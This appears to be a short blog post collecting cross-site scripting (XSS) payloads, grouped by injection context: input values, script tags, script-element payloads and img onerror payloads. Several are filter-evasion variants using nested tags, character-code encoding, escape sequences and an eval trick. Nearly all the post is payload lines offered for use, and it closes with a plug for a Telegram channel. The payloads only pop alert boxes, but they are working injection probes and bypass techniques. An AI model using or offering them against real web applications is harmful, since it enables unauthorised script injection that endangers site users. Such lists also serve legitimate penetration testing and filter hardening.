In this post i will show top and useful xss payloads in 2022. i found xss vulnerabilities in many web apps with some of them below.
You can use payloads below when you are dealing with a injection that goes inside the value of a input:
\"-alert(1)//
\'-alert(1)//
%26apos;-alert(1)-%26apos
'-alert(1)-'
Use these payloads when you are injecting inside a script tag
</script><img/src/onerror=alert(1)>
<a href="javascript:var a=''-alert(1)-''">
And we have some common payloads here
// Basic payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="javascript:alert(23)">
// Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
Find Security and Bug Bounty Books in my telegram channel ==>
Top comments (0)